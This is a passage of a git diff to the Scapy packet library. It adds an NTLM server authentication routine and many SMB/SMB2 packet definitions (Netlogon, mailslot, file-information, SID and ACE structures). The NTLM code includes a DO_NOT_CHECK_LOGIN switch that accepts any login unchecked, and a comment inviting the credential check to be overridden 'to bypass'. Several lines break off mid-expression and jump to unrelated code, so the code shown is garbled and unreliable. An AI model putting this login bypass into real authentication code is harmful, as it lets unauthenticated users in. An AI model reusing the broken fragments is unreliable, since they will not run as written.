"REQUEST_TARGET", + "NEGOTIATE_SIGN", + "NEGOTIATE_SEAL", + "NEGOTIATE_NTLM", + "NEGOTIATE_ALWAYS_SIGN", + "TARGET_TYPE_DOMAIN", + "NEGOTIATE_EXTENDED_SESSIONSECURITY", + "NEGOTIATE_TARGET_INFO", + "NEGOTIATE_VERSION", + "NEGOTIATE_128", + "NEGOTIATE_KEY_EXCH", + "NEGOTIATE_56", + ] + ), + ProductMajorVersion=10, + ProductMinorVersion=0, + Payload=[ + ("TargetName", ""), + ( + "TargetInfo", + [ + # MsvAvNbComputerName + AV_PAIR(AvId=1, Value=self.COMPUTER_NB_NAME), + # MsvAvNbDomainName + AV_PAIR(AvId=2, Value=self.DOMAIN_NB_NAME), + # MsvAvDnsComputerName + AV_PAIR(AvId=3, Value=self.COMPUTER_FQDN), + # MsvAvDnsDomainName + AV_PAIR(AvId=4, Value=self.DOMAIN_FQDN), + # MsvAvDnsTreeName + AV_PAIR(AvId=5, Value=self.DOMAIN_FQDN), + # MsvAvTimestamp + AV_PAIR(AvId=7, Value=currentTime), + # MsvAvEOL + AV_PAIR(AvId=0), + ], + ), + ], + ) + if self.NTLM_VALUES: + # Update that token with the customs one + for key in [ + "ServerChallenge", + "NegotiateFlags", + "ProductMajorVersion", + "ProductMinorVersion", + "TargetName", + ]: + if key in self.NTLM_VALUES: + setattr(tok, key, self.NTLM_VALUES[key]) + avpairs = {x.AvId: x.Value for x in tok.TargetInfo} + tok.TargetInfo = [ + AV_PAIR(AvId=i, Value=self.NTLM_VALUES.get(x, avpairs[i])) + for (i, x) in [ + (2, "NetbiosDomainName"), + (1, "NetbiosComputerName"), + (4, "DnsDomainName"), + (3, "DnsComputerName"), + (5, "DnsTreeName"), + (6, "Flags"), + (7, "Timestamp"), + (0, None), + ] + if ((x in self.NTLM_VALUES) or (i in avpairs)) + and self.NTLM_VALUES.get(x, True) is not None + ] + Context.chall_tok = tok + Context.state = self.STATE.SRV_SENT_CHAL + return Context, tok, GSS_S_CONTINUE_NEEDED + elif Context.state == self.STATE.SRV_SENT_CHAL: + # server: OK or challenge again (val=auth) + auth_tok = val + if not auth_tok or NTLM_AUTHENTICATE_V2 not in auth_tok: + auth_tok.show() + raise ValueError( + "NTLMSSP: Unexpected token. Expected NTLM Authenticate v2" + ) + if self.DO_NOT_CHECK_LOGIN: + # Just trust me bro + return Context, None, GSS_S_COMPLETE + SessionBaseKey = self._getSessionBaseKey(Context, auth_tok) + if SessionBaseKey: + # [MS-NLMP] sect 3.2.5.1.2 + KeyExchangeKey = SessionBaseKey # Only true for NTLMv2 + if auth_tok.NegotiateFlags.NEGOTIATE_KEY_EXCH: + ExportedSessionKey = RC4K( + KeyExchangeKey, auth_tok.EncryptedRandomSessionKey + ) + else: + ExportedSessionKey = KeyExchangeKey + Context.ExportedSessionKey = ExportedSessionKey + # [MS-SMB] 3.2.5.3 + Context.SessionKey = Context.ExportedSessionKey + # Check the NTProofStr + if Context.SessionKey: + # Compute NTLM keys + Context.SendSignKey = SIGNKEY( + auth_tok.NegotiateFlags, ExportedSessionKey, "Server" + ) + Context.SendSealKey = SEALKEY( + auth_tok.NegotiateFlags, ExportedSessionKey, "Server" + ) + Context.SendSealHandle = RC4Init(Context.SendSealKey) + Context.RecvSignKey = SIGNKEY( + auth_tok.NegotiateFlags, ExportedSessionKey, "Client" + ) + Context.RecvSealKey = SEALKEY( + auth_tok.NegotiateFlags, ExportedSessionKey, "Client" + ) + Context.RecvSealHandle = RC4Init(Context.RecvSealKey) + if self._checkLogin(Context, auth_tok): + return Context, None, GSS_S_COMPLETE + # Bad NTProofStr or unknown user + Context.SessionKey = None + Context.state = self.STATE.INIT + return Context, None, GSS_S_DEFECTIVE_CREDENTIAL + else: + raise ValueError("NTLMSSP: unexpected state %s" % repr(Context.state)) + + def _getSessionBaseKey(self, Context, auth_tok): + """ + Function that returns the SessionBaseKey from the ntlm Authenticate. + """ + if auth_tok.UserNameLen: + username = auth_tok.UserName + else: + username = None + if auth_tok.DomainNameLen: + domain = auth_tok.DomainName + else: + domain = self.DOMAIN_NB_NAME + if self.IDENTITIES and username in self.IDENTITIES: + ResponseKeyNT = NTOWFv2( + None, username, domain, HashNt=self.IDENTITIES[username] + ) + return NTLMv2_ComputeSessionBaseKey( + ResponseKeyNT, auth_tok.NtChallengeResponse.NTProofStr + ) + return None + + def _checkLogin(self, Context, auth_tok): + """ + Function that checks the validity of an authentication. + + Overwrite and return True to bypass. + """ + # Create the NTLM AUTH + if auth_tok.UserNameLen: + username = auth_tok.UserName + else: + username = None + if auth_tok.DomainNameLen: + domain = auth_tok.DomainName + else: + domain = self.DOMAIN_NB_NAME + if username in self.IDENTITIES: + ResponseKeyNT = NTOWFv2( + None, username, domain, HashNt=self.IDENTITIES[username] + ) + NTProofStr = auth_tok.NtChallengeResponse.computeNTProofStr( + ResponseKeyNT, + Context.chall_tok.ServerChallenge, + ) + if NTProofStr == auth_tok.NtChallengeResponse.NTProofStr: + return True + return False diff --git a/scapy/layers/smb.py b/scapy/layers/smb.py index d0a9853b4d9..de0b13fec10 100644 --- a/scapy/layers/smb.py +++ b/scapy/layers/smb.py @@ -2,6 +2,7 @@ # This file is part of Scapy # See https://scapy.net/ for more information # Copyright (C) Philippe Biondi +# Copyright (C) Gabriel Potter """ SMB (Server Message Block), also known as CIFS. @@ -20,10 +21,14 @@ ByteField, FieldLenField, FlagsField, + FieldListField, + IPField, LEFieldLenField, LEIntEnumField, LEIntField, + LELongField, LEShortField, + LEShortEnumField, MultipleTypeField, PacketLenField, PacketListField, @@ -38,7 +43,17 @@ XStrLenField, ) -from scapy.layers.netbios import NBTSession +from scapy.layers.dns import ( + DNSStrField, + DNSCompressedPacket, +) +from scapy.layers.ntlm import ( + _NTLMPayloadPacket, + _NTLMPayloadField, + _NTLM_ENUM, + _NTLM_post_build, +) +from scapy.layers.netbios import NBTSession, NBTDatagram from scapy.layers.gssapi import ( GSSAPI_BLOB, ) @@ -129,42 +144,56 @@ class SMB_Header(Packet): name = "SMB 1 Protocol Request Header" - fields_desc = [StrFixedLenField("Start", b"\xffSMB", 4), - ByteEnumField("Command", 0x72, SMB_COM), - LEIntEnumField("Status", 0, STATUS_ERREF), - FlagsField("Flags", 0x18, 8, - ["LOCK_AND_READ_OK", - "BUF_AVAIL", - "res", - "CASE_INSENSITIVE", - "CANONICALIZED_PATHS", - "OPLOCK", - "OPBATCH", - "REPLY"]), - FlagsField("Flags2", 0x0000, -16, - ["LONG_NAMES", - "EAS", - "SMB_SECURITY_SIGNATURE", - "COMPRESSED", - "SMB_SECURITY_SIGNATURE_REQUIRED", - "res", - "IS_LONG_NAME", - "res", - "res", - "res", - "REPARSE_PATH", - "EXTENDED_SECURITY", - "DFS", - "PAGING_IO", - "NT_STATUS", - "UNICODE"]), - LEShortField("PIDHigh", 0x0000), - StrFixedLenField("SecuritySignature", b"", length=8), - LEShortField("Reserved", 0x0), - LEShortField("TID", 0), - LEShortField("PIDLow", 1), - LEShortField("UID", 0), - LEShortField("MID", 0)] + fields_desc = [ + StrFixedLenField("Start", b"\xffSMB", 4), + ByteEnumField("Command", 0x72, SMB_COM), + LEIntEnumField("Status", 0, STATUS_ERREF), + FlagsField( + "Flags", + 0x18, + 8, + [ + "LOCK_AND_READ_OK", + "BUF_AVAIL", + "res", + "CASE_INSENSITIVE", + "CANONICALIZED_PATHS", + "OPLOCK", + "OPBATCH", + "REPLY", + ], + ), + FlagsField( + "Flags2", + 0x0000, + -16, + [ + "LONG_NAMES", + "EAS", + "SMB_SECURITY_SIGNATURE", + "COMPRESSED", + "SMB_SECURITY_SIGNATURE_REQUIRED", + "res", + "IS_LONG_NAME", + "res", + "res", + "res", + "REPARSE_PATH", + "EXTENDED_SECURITY", + "DFS", + "PAGING_IO", + "NT_STATUS", + "UNICODE", + ], + ), + LEShortField("PIDHigh", 0x0000), + StrFixedLenField("SecuritySignature", b"", length=8), + LEShortField("Reserved", 0x0), + LEShortField("TID", 0), + LEShortField("PIDLow", 0), + LEShortField("UID", 0), + LEShortField("MID", 0), + ] def guess_payload_class(self, payload): # type: (bytes) -> Packet @@ -201,7 +230,16 @@ def guess_payload_class(self, payload): else: return SMBSession_Setup_AndX_Request elif self.Command == 0x25: - return SMBNetlogon_Protocol_Response_Header + if self.Flags.REPLY: + if WordCount == 0x11: + return SMBMailslot_Write + else: + return SMBTransaction_Response + else: + if WordCount == 0x11: + return SMBMailslot_Write + else: + return SMBTransaction_Request return super(SMB_Header, self).guess_payload_class(payload) def answers(self, pkt): @@ -213,8 +251,10 @@ def answers(self, pkt): class SMB_Dialect(Packet): name = "SMB Dialect" - fields_desc = [ByteField("BufferFormat", 0x02), - StrNullField("DialectString", "NT LM 0.12")] + fields_desc = [ + ByteField("BufferFormat", 0x02), + StrNullField("DialectString", "NT LM 0.12"), + ] def default_payload_class(self, payload): return conf.padding_layer @@ -222,12 +262,16 @@ def default_payload_class(self, payload): class SMBNegotiate_Request(Packet): name = "SMB Negotiate Request" - fields_desc = [ByteField("WordCount", 0), - LEFieldLenField("ByteCount", None, length_of="Dialects"), - PacketListField( - "Dialects", [SMB_Dialect()], SMB_Dialect, - length_from=lambda pkt: pkt.ByteCount) - ] + fields_desc = [ + ByteField("WordCount", 0), + LEFieldLenField("ByteCount", None, length_of="Dialects"), + PacketListField( + "Dialects", + [SMB_Dialect()], + SMB_Dialect, + length_from=lambda pkt: pkt.ByteCount, + ), + ] bind_layers(SMB_Header, SMBNegotiate_Request, Command=0x72) @@ -240,15 +284,14 @@ def _SMBStrNullField(name, default): Returns a StrNullField that is either normal or UTF-16 depending on the SMB headers. """ + def _isUTF16(pkt): while not hasattr(pkt, "Flags2") and pkt.underlayer: pkt = pkt.underlayer return hasattr(pkt, "Flags2") and pkt.Flags2.UNICODE + return MultipleTypeField( - [ - (StrNullFieldUtf16(name, default), - _isUTF16) - ], + [(StrNullFieldUtf16(name, default), _isUTF16)], StrNullField(name, default), ) @@ -293,59 +336,87 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): "LEVEL_II_OPLOCKS", "LOCK_AND_READ", "NT_FIND", - "res", "res", + "res", + "res", "DFS", "INFOLEVEL_PASSTHRU", "LARGE_READX", "LARGE_WRITEX", "LWIO", - "res", "res", "res", "res", "res", "res", + "res", + "res", + "res", + "res", + "res", + "res", "UNIX", "res", "COMPRESSED_DATA", - "res", "res", "res", + "res", + "res", + "res", "DYNAMIC_REAUTH", "PERSISTENT_HANDLES", - "EXTENDED_SECURITY" + "EXTENDED_SECURITY", ] # CIFS sect 2.2.4.52.2 + class SMBNegotiate_Response_NoSecurity(_SMBNegotiate_Response): name = "SMB Negotiate No-Security Response (CIFS)" - fields_desc = [ByteField("WordCount", 0x1), - LEShortField("DialectIndex", 7), - FlagsField("SecurityMode", 0x03, 8, - ["USER_SECURITY", - "ENCRYPT_PASSWORDS", - "SECURITY_SIGNATURES_ENABLED", - "SECURITY_SIGNATURES_REQUIRED"]), - LEShortField("MaxMpxCount", 50), - LEShortField("MaxNumberVC", 1), - LEIntField("MaxBufferSize", 16144), # Windows: 4356 - LEIntField("MaxRawSize", 65536), - LEIntField("SessionKey", 0x0000), - FlagsField("ServerCapabilities", 0xf3f9, -32, - _SMB_ServerCapabilities), - UTCTimeField("ServerTime", None, fmt=" bytes + return ( + _NTLM_post_build( + self, + pkt, + 32 + 31 + len(self.Setup) * 2 + len(self.Name) + 1, + { + "Parameter": 19, + "Data": 23, + }, + config=_SMB_CONFIG, + ) + + pay + ) + + +bind_top_down(SMB_Header, SMBTransaction_Request, Command=0x25) + + +class SMBMailslot_Write(SMBTransaction_Request): + WordCount = 0x11 + + +# [MS-CIFS] sect 2.2.4.33.2 + + +class SMBTransaction_Response(_NTLMPayloadPacket): + name = "SMB COM Transaction Response" + _NTLM_PAYLOAD_FIELD_NAME = "Buffer" + fields_desc = [ + FieldLenField( + "WordCount", + None, + length_of="SetupCount", + adjust=lambda pkt, x: x + 0x0A, + fmt="B", + ), + FieldLenField( + "TotalParamCount", + None, + length_of="Buffer", + fmt=" bytes + return ( + _NTLM_post_build( + self, + pkt, + 32 + 22 + len(self.Setup) * 2, + { + "Parameter": 7, + "Data": 13, + }, + config=_SMB_CONFIG, + ) + + pay + ) + + +bind_top_down(SMB_Header, SMBTransaction_Response, Command=0x25, Flags=0x80) + + +# [MS-ADTS] sect 6.3.1.4 + +_NETLOGON_opcodes = { + 0x7: "LOGON_PRIMARY_QUERY", + 0x12: "LOGON_SAM_LOGON_REQUEST", + 0x17: "LOGON_SAM_USER_UNKNOWN", + 0x19: "LOGON_SAM_LOGON_RESPONSE_EX", +} + +_NV_VERSION = { + 0x00000001: "1", + 0x00000002: "5", + 0x00000004: "5EX", + 0x00000008: "5EX_WITH_IP", + 0x00000010: "5EX_WITH_CLOSEST_SITE", + 0x01000000: "AVOID_NT4EMUL", + 0x10000000: "PDC", + 0x40000000: "LOCAL", + 0x80000000: "GC", +} + + +class NETLOGON_LOGON_QUERY(Packet): + fields_desc = [ + LEShortEnumField("OpCode", 0x7, _NETLOGON_opcodes), + StrNullField("ComputerName", ""), + StrNullField("MailslotName", ""), + StrNullFieldUtf16("UnicodeComputerName", ""), + FlagsField("NtVersion", 0xB, -32, _NV_VERSION), + LEShortField("LmNtToken", 0xFFFF), + LEShortField("Lm20Token", 0xFFFF), + ] + + +# [MS-ADTS] sect 6.3.1.6 + + +class NETLOGON_SAM_LOGON_REQUEST(Packet): + fields_desc = [ + LEShortEnumField("OpCode", 0x12, _NETLOGON_opcodes), + LEShortField("RequestCount", 0), + StrNullFieldUtf16("UnicodeComputerName", ""), + StrNullFieldUtf16("UnicodeUserName", ""), + StrNullField("MailslotName", "\\MAILSLOT\\NET\\GETDC701253F9"), + LEIntField("AllowableAccountControlBits", 0), + FieldLenField("DomainSidSize", None, fmt="= 4: - if _pkt[:4] == b'\xffSMB': + if _pkt[:4] == b"\xffSMB": return SMB_Header - if _pkt[:4] == b'\xfeSMB': + if _pkt[:4] == b"\xfeSMB": return SMB2_Header return cls -bind_layers(NBTSession, SMBNegociate_Protocol_Request_Header_Generic) +bind_layers(NBTSession, _SMBGeneric) +bind_layers(NBTDatagram, _SMBGeneric) diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 154bc5b4dd2..21947dcc862 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -1,12 +1,14 @@ # SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy # See https://scapy.net/ for more information -# Copyright (C) Philippe Biondi +# Copyright (C) Gabriel Potter """ SMB (Server Message Block), also known as CIFS - version 2 """ +import collections +import hashlib import struct from scapy.config import conf @@ -18,12 +20,16 @@ ConditionalField, FieldLenField, FieldListField, + FlagValue, FlagsField, + IP6Field, + IPField, IntEnumField, IntField, LEIntField, LEIntEnumField, LELongField, + LenField, LEShortEnumField, LEShortField, MultipleTypeField, @@ -32,13 +38,15 @@ PacketLenField, PacketListField, ReversePadField, + ScalingField, ShortEnumField, ShortField, StrFieldUtf16, StrFixedLenField, - StrLenFieldUtf16, StrLenField, + StrLenFieldUtf16, StrNullFieldUtf16, + ThreeBytesField, UTCTimeField, UUIDField, XLEIntField, @@ -47,40 +55,123 @@ XStrLenField, XStrFixedLenField, ) +from scapy.supersocket import StreamSocket -from scapy.layers.netbios import NBTSession from scapy.layers.gssapi import GSSAPI_BLOB -from scapy.layers.ntlm import _NTLMPayloadField, _NTLMPayloadPacket +from scapy.layers.netbios import NBTSession +from scapy.layers.ntlm import ( + _NTLMPayloadField, + _NTLMPayloadPacket, + _NTLM_ENUM, + _NTLM_post_build, +) # EnumField SMB_DIALECTS = { - 0x0202: 'SMB 2.002', - 0x0210: 'SMB 2.1', - 0x02ff: 'SMB 2.???', - 0x0300: 'SMB 3.0', - 0x0302: 'SMB 3.0.2', - 0x0311: 'SMB 3.1.1', + 0x0202: "SMB 2.002", + 0x0210: "SMB 2.1", + 0x02FF: "SMB 2.???", + 0x0300: "SMB 3.0", + 0x0302: "SMB 3.0.2", + 0x0311: "SMB 3.1.1", } # SMB2 sect 3.3.5.15 + [MS-ERREF] STATUS_ERREF = { 0x00000000: "STATUS_SUCCESS", 0x00000103: "STATUS_PENDING", + 0x0000010B: "STATUS_NOTIFY_CLEANUP", 0x0000010C: "STATUS_NOTIFY_ENUM_DIR", + 0x00000532: "ERROR_PASSWORD_EXPIRED", + 0x00000533: "ERROR_ACCOUNT_DISABLED", + 0x80000005: "STATUS_BUFFER_OVERFLOW", + 0x80000006: "STATUS_NO_MORE_FILES", + 0x8000002D: "STATUS_STOPPED_ON_SYMLINK", + 0xC0000003: "STATUS_INVALID_INFO_CLASS", + 0xC0000004: "STATUS_INFO_LENGTH_MISMATCH", + 0xC000000D: "STATUS_INVALID_PARAMETER", + 0xC000000F: "STATUS_NO_SUCH_FILE", 0xC0000016: "STATUS_MORE_PROCESSING_REQUIRED", 0xC0000022: "STATUS_ACCESS_DENIED", + 0xC0000033: "STATUS_OBJECT_NAME_INVALID", 0xC0000034: "STATUS_OBJECT_NAME_NOT_FOUND", + 0xC0000043: "STATUS_SHARING_VIOLATION", + 0xC000006D: "STATUS_LOGON_FAILURE", + 0xC0000071: "STATUS_PASSWORD_EXPIRED", + 0xC0000072: "STATUS_ACCOUNT_DISABLED", 0xC000009A: "STATUS_INSUFFICIENT_RESOURCES", + 0xC00000BA: "STATUS_FILE_IS_A_DIRECTORY", + 0xC00000BB: "STATUS_NOT_SUPPORTED", + 0xC00000C9: "STATUS_NETWORK_NAME_DELETED", + 0xC00000CC: "STATUS_BAD_NETWORK_NAME", 0xC0000120: "STATUS_CANCELLED", 0xC0000128: "STATUS_FILE_CLOSED", # backup error for older Win versions - 0xC000000D: "STATUS_INVALID_PARAMETER", - 0xC000000F: "STATUS_NO_SUCH_FILE", - 0xC00000BB: "STATUS_NOT_SUPPORTED", + 0xC000015B: "STATUS_LOGON_TYPE_NOT_GRANTED", 0xC000019C: "STATUS_FS_DRIVER_REQUIRED", + 0xC0000203: "STATUS_USER_SESSION_DELETED", + 0xC000020C: "STATUS_CONNECTION_DISCONNECTED", 0xC0000225: "STATUS_NOT_FOUND", - 0x80000005: "STATUS_BUFFER_OVERFLOW", - 0x80000006: "STATUS_NO_MORE_FILES", + 0xC0000257: "STATUS_PATH_NOT_COVERED", + 0xC000035C: "STATUS_NETWORK_SESSION_EXPIRED", +} + +# SMB2 sect 2.1.2.1 +REPARSE_TAGS = { + 0x00000000: "IO_REPARSE_TAG_RESERVED_ZERO", + 0x00000001: "IO_REPARSE_TAG_RESERVED_ONE", + 0x00000002: "IO_REPARSE_TAG_RESERVED_TWO", + 0xA0000003: "IO_REPARSE_TAG_MOUNT_POINT", + 0xC0000004: "IO_REPARSE_TAG_HSM", + 0x80000005: "IO_REPARSE_TAG_DRIVE_EXTENDER", + 0x80000006: "IO_REPARSE_TAG_HSM2", + 0x80000007: "IO_REPARSE_TAG_SIS", + 0x80000008: "IO_REPARSE_TAG_WIM", + 0x80000009: "IO_REPARSE_TAG_CSV", + 0x8000000A: "IO_REPARSE_TAG_DFS", + 0x8000000B: "IO_REPARSE_TAG_FILTER_MANAGER", + 0xA000000C: "IO_REPARSE_TAG_SYMLINK", + 0xA0000010: "IO_REPARSE_TAG_IIS_CACHE", + 0x80000012: "IO_REPARSE_TAG_DFSR", + 0x80000013: "IO_REPARSE_TAG_DEDUP", + 0xC0000014: "IO_REPARSE_TAG_APPXSTRM", + 0x80000014: "IO_REPARSE_TAG_NFS", + 0x80000015: "IO_REPARSE_TAG_FILE_PLACEHOLDER", + 0x80000016: "IO_REPARSE_TAG_DFM", + 0x80000017: "IO_REPARSE_TAG_WOF", + 0x80000018: "IO_REPARSE_TAG_WCI", + 0x90001018: "IO_REPARSE_TAG_WCI_1", + 0xA0000019: "IO_REPARSE_TAG_GLOBAL_REPARSE", + 0x9000001A: "IO_REPARSE_TAG_CLOUD", + 0x9000101A: "IO_REPARSE_TAG_CLOUD_1", + 0x9000201A: "IO_REPARSE_TAG_CLOUD_2", + 0x9000301A: "IO_REPARSE_TAG_CLOUD_3", + 0x9000401A: "IO_REPARSE_TAG_CLOUD_4", + 0x9000501A: "IO_REPARSE_TAG_CLOUD_5", + 0x9000601A: "IO_REPARSE_TAG_CLOUD_6", + 0x9000701A: "IO_REPARSE_TAG_CLOUD_7", + 0x9000801A: "IO_REPARSE_TAG_CLOUD_8", + 0x9000901A: "IO_REPARSE_TAG_CLOUD_9", + 0x9000A01A: "IO_REPARSE_TAG_CLOUD_A", + 0x9000B01A: "IO_REPARSE_TAG_CLOUD_B", + 0x9000C01A: "IO_REPARSE_TAG_CLOUD_C", + 0x9000D01A: "IO_REPARSE_TAG_CLOUD_D", + 0x9000E01A: "IO_REPARSE_TAG_CLOUD_E", + 0x9000F01A: "IO_REPARSE_TAG_CLOUD_F", + 0x8000001B: "IO_REPARSE_TAG_APPEXECLINK", + 0x9000001C: "IO_REPARSE_TAG_PROJFS", + 0xA000001D: "IO_REPARSE_TAG_LX_SYMLINK", + 0x8000001E: "IO_REPARSE_TAG_STORAGE_SYNC", + 0xA000001F: "IO_REPARSE_TAG_WCI_TOMBSTONE", + 0x80000020: "IO_REPARSE_TAG_UNHANDLED", + 0x80000021: "IO_REPARSE_TAG_ONEDRIVE", + 0xA0000022: "IO_REPARSE_TAG_PROJFS_TOMBSTONE", + 0x80000023: "IO_REPARSE_TAG_AF_UNIX", + 0x80000024: "IO_REPARSE_TAG_LX_FIFO", + 0x80000025: "IO_REPARSE_TAG_LX_CHR", + 0x80000026: "IO_REPARSE_TAG_LX_BLK", + 0xA0000027: "IO_REPARSE_TAG_WCI_LINK", + 0xA0001027: "IO_REPARSE_TAG_WCI_LINK_1", } # SMB2 sect 2.2.1.1 @@ -108,28 +199,31 @@ # EnumField SMB2_NEGOTIATE_CONTEXT_TYPES = { - 0x0001: 'SMB2_PREAUTH_INTEGRITY_CAPABILITIES', - 0x0002: 'SMB2_ENCRYPTION_CAPABILITIES', - 0x0003: 'SMB2_COMPRESSION_CAPABILITIES', - 0x0005: 'SMB2_NETNAME_NEGOTIATE_CONTEXT_ID', - 0x0006: 'SMB2_TRANSPORT_CAPABILITIES', - 0x0007: 'SMB2_RDMA_TRANSFORM_CAPABILITIES', - 0x0008: 'SMB2_SIGNING_CAPABILITIES', + 0x0001: "SMB2_PREAUTH_INTEGRITY_CAPABILITIES", + 0x0002: "SMB2_ENCRYPTION_CAPABILITIES", + 0x0003: "SMB2_COMPRESSION_CAPABILITIES", + 0x0005: "SMB2_NETNAME_NEGOTIATE_CONTEXT_ID", + 0x0006: "SMB2_TRANSPORT_CAPABILITIES", + 0x0007: "SMB2_RDMA_TRANSFORM_CAPABILITIES", + 0x0008: "SMB2_SIGNING_CAPABILITIES", } # FlagField SMB2_CAPABILITIES = { 0x00000001: "DFS", - 0x00000002: "Leasing", - 0x00000004: "LargeMTU", - 0x00000008: "MultiChannel", - 0x00000010: "PersistentHandles", - 0x00000020: "DirectoryLeasing", - 0x00000040: "Encryption", - + 0x00000002: "LEASING", + 0x00000004: "LARGE_MTU", + 0x00000008: "MULTI_CHANNEL", + 0x00000010: "PERSISTENT_HANDLES", + 0x00000020: "DIRECTORY_LEASING", + 0x00000040: "ENCRYPTION", +} +SMB2_SECURITY_MODE = { + 0x01: "SIGNING_ENABLED", + 0x02: "SIGNING_REQUIRED", } -# EnumField +# [MS-SMB2] 2.2.3.1.3 SMB2_COMPRESSION_ALGORITHMS = { 0x0000: "None", 0x0001: "LZNT1", @@ -138,6 +232,65 @@ 0x0004: "Pattern_V1", } +# sect [MS-SMB2] 2.2.13.1.1 +SMB2_ACCESS_FLAGS_FILE = { + 0x00000001: "FILE_READ_DATA", + 0x00000002: "FILE_WRITE_DATA", + 0x00000004: "FILE_APPEND_DATA", + 0x00000008: "FILE_READ_EA", + 0x00000010: "FILE_WRITE_EA", + 0x00000040: "FILE_DELETE_CHILD", + 0x00000020: "FILE_EXECUTE", + 0x00000080: "FILE_READ_ATTRIBUTES", + 0x00000100: "FILE_WRITE_ATTRIBUTES", + 0x00010000: "DELETE", + 0x00020000: "READ_CONTROL", + 0x00040000: "WRITE_DAC", + 0x00080000: "WRITE_OWNER", + 0x00100000: "SYNCHRONIZE", + 0x01000000: "ACCESS_SYSTEM_SECURITY", + 0x02000000: "MAXIMUM_ALLOWED", + 0x10000000: "GENERIC_ALL", + 0x20000000: "GENERIC_EXECUTE", + 0x40000000: "GENERIC_WRITE", + 0x80000000: "GENERIC_READ", +} + +# sect [MS-SMB2] 2.2.13.1.2 +SMB2_ACCESS_FLAGS_DIRECTORY = { + 0x00000001: "FILE_LIST_DIRECTORY", + 0x00000002: "FILE_ADD_FILE", + 0x00000004: "FILE_ADD_SUBDIRECTORY", + 0x00000008: "FILE_READ_EA", + 0x00000010: "FILE_WRITE_EA", + 0x00000020: "FILE_TRAVERSE", + 0x00000040: "FILE_DELETE_CHILD", + 0x00000080: "FILE_READ_ATTRIBUTES", + 0x00000100: "FILE_WRITE_ATTRIBUTES", + 0x00010000: "DELETE", + 0x00020000: "READ_CONTROL", + 0x00040000: "WRITE_DAC", + 0x00080000: "WRITE_OWNER", + 0x00100000: "SYNCHRONIZE", + 0x01000000: "ACCESS_SYSTEM_SECURITY", + 0x02000000: "MAXIMUM_ALLOWED", + 0x10000000: "GENERIC_ALL", + 0x20000000: "GENERIC_EXECUTE", + 0x40000000: "GENERIC_WRITE", + 0x80000000: "GENERIC_READ", +} + +# [MS-SRVS] sec 2.2.2.4 +SRVSVC_SHARE_TYPES = { + 0x00000000: "DISKTREE", + 0x00000001: "PRINTQ", + 0x00000002: "DEVICE", + 0x00000003: "IPC", + 0x02000000: "CLUSTER_FS", + 0x04000000: "CLUSTER_SOFS", + 0x08000000: "CLUSTER_DFS", +} + # [MS-FSCC] sec 2.6 FileAttributes = { @@ -168,72 +321,221 @@ 0x01: "FileDirectoryInformation", 0x02: "FileFullDirectoryInformation", 0x03: "FileBothDirectoryInformation", + 0x04: "FileBasicInformation", 0x05: "FileStandardInformation", 0x06: "FileInternalInformation", 0x07: "FileEaInformation", + 0x08: "FileAccessInformation", + 0x0E: "FilePositionInformation", + 0x10: "FileModeInformation", + 0x11: "FileAlignmentInformation", + 0x12: "FileAllInformation", 0x22: "FileNetworkOpenInformation", 0x25: "FileIdBothDirectoryInformation", 0x26: "FileIdFullDirectoryInformation", 0x0C: "FileNamesInformation", + 0x30: "FileNormalizedNameInformation", 0x3C: "FileIdExtdDirectoryInformation", } +# [MS-FSCC] 2.1.7 FILE_NAME_INFORMATION + + +class FILE_NAME_INFORMATION(Packet): + fields_desc = [ + FieldLenField("FileNameLength", None, length_of="FileName", fmt=" 65535 / len(FILE_ID_BOTH_DIR_INFORMATION()) + ), ] + # [MS-FSCC] 2.4.22 FileInternalInformation @@ -264,6 +617,46 @@ class FileInternalInformation(Packet): LELongField("IndexNumber", 0), ] + def default_payload_class(self, s): + return conf.padding_layer + + +# [MS-FSCC] 2.4.26 FileModeInformation + + +class FileModeInformation(Packet): + fields_desc = [ + FlagsField( + "Mode", + 0, + -32, + { + 0x00000002: "FILE_WRITE_TROUGH", + 0x00000004: "FILE_SEQUENTIAL_ONLY", + 0x00000008: "FILE_NO_INTERMEDIATE_BUFFERING", + 0x00000010: "FILE_SYNCHRONOUS_IO_ALERT", + 0x00000020: "FILE_SYNCHRONOUS_IO_NONALERT", + 0x00001000: "FILE_DELETE_ON_CLOSE", + }, + ) + ] + + def default_payload_class(self, s): + return conf.padding_layer + + +# [MS-FSCC] 2.4.35 FilePositionInformation + + +class FilePositionInformation(Packet): + fields_desc = [ + LELongField("CurrentByteOffset", 0), + ] + + def default_payload_class(self, s): + return conf.padding_layer + + # [MS-FSCC] 2.4.41 FileStandardInformation @@ -277,6 +670,10 @@ class FileStandardInformation(Packet): ShortField("Reserved", 0), ] + def default_payload_class(self, s): + return conf.padding_layer + + # [MS-FSCC] 2.4.43 FileStreamInformation @@ -285,95 +682,584 @@ class FileStreamInformation(Packet): LEIntField("Next", 0), FieldLenField("StreamNameLength", None, length_of="StreamName", fmt="Q", b"\x00\x00" + self.IdentifierAuthority.Value)[0], + ("-%s" % "-".join(str(x) for x in self.SubAuthority)) + if self.SubAuthority + else "", + ) + + +# [MS-DTYP] sect 2.4.3 + +_WINNT_ACCESS_MASK = { + 0x80000000: "GENERIC_READ", + 0x40000000: "GENERIC_WRITE", + 0x20000000: "GENERIC_EXECUTE", + 0x10000000: "GENERIC_ALL", + 0x02000000: "MAXIMUM_ALLOWED", + 0x01000000: "ACCESS_SYSTEM_SECURITY", + 0x00100000: "SYNCHRONIZE", + 0x00080000: "WRITE_OWNER", + 0x00040000: "WRITE_DACL", + 0x00020000: "READ_CONTROL", + 0x00010000: "DELETE", +} + + +# [MS-DTYP] sect 2.4.4.1 + + +class WINNT_ACE_HEADER(Packet): + fields_desc = [ + ByteEnumField( + "AceType", + 0, + { + 0x00: "ACCESS_ALLOWED", + 0x01: "ACCESS_DENIED", + 0x02: "SYSTEM_AUDIT", + 0x03: "SYSTEM_ALARM", + 0x04: "ACCESS_ALLOWED_COMPOUND", + 0x05: "ACCESS_ALLOWED_OBJECT", + 0x06: "ACCESS_DENIED_OBJECT", + 0x07: "SYSTEM_AUDIT_OBJECT", + 0x08: "SYSTEM_ALARM_OBJECT", + 0x09: "ACCESS_ALLOWED_CALLBACK", + 0x0A: "ACCESS_DENIED_CALLBACK", + 0x0B: "ACCESS_ALLOWED_CALLBACK_OBJECT", + 0x0C: "ACCESS_DENIED_CALLBACK_OBJECT", + 0x0D: "SYSTEM_AUDIT_CALLBACK", + 0x0E: 